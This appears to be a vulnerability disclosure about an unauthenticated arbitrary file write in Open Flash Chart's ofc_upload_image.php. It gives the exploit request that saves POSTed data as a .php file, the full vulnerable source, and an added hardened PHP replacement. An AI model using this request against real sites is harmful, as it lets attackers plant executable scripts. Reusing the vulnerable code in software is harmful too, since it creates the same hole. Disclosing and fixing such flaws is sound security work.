Vulnerable file saves POST data as a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is in the latest version of wss, and even the paid version has it; this is the demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//


// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}


?>

Fix:
This vulnerable file is simply a tragedy. How to deal with it: add permission checks, extension validation and so on~ do it yourself.
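
Added example (not part of the original post, and not Open Flash Chart or wss code): one way to apply the permission and extension checks named in the fix to the raw-POST branch of ofc_upload_image.php. Assumptions: the application's login code sets $_SESSION['user_id'] (hypothetical key), charts are saved only as PNG, and the 2 MiB limit is an arbitrary choice.

```php
<?php
// Added example, not Open Flash Chart or wss code: a hardened image-save endpoint.
// Assumptions (hypothetical): login code sets $_SESSION['user_id']; charts are PNG only.
declare(strict_types=1);
session_start();

const MAX_BYTES = 2097152; // assumed 2 MiB ceiling for one chart image

function reject(int $status, string $message): void
{
    http_response_code($status);
    exit($message);
}

// 1. Permission check: only an authenticated POST may write to disk.
if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || empty($_SESSION['user_id'])) {
    reject(403, 'Forbidden');
}

// 2. Read the raw body with a size cap. php://input replaces
//    $HTTP_RAW_POST_DATA, which PHP 7 removed.
$body = file_get_contents('php://input', false, null, 0, MAX_BYTES + 1);
if ($body === false || $body === '' || strlen($body) > MAX_BYTES) {
    reject(400, 'Empty or oversized body');
}

// 3. Content check: the bytes must parse as a PNG, whatever the client claims.
$info = @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    reject(415, 'Not a PNG image');
}

// 4. Name check: the server chooses both name and extension, so the
//    client-supplied ?name= value never reaches the filesystem.
$dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
    reject(500, 'Storage unavailable');
}
$name = bin2hex(random_bytes(16)) . '.png';

// 5. 'x' mode refuses to overwrite an existing file.
$fh = fopen($dir . $name, 'xb');
if ($fh === false || fwrite($fh, $body) !== strlen($body)) {
    reject(500, 'Write failed');
}
fclose($fh);

echo 'Saved as: ' . $name;
```

The code after exit() in the original file never runs, so it is left out here. Configuring the web server not to execute scripts from tmp-upload-images/ gives a second layer if a check is ever bypassed.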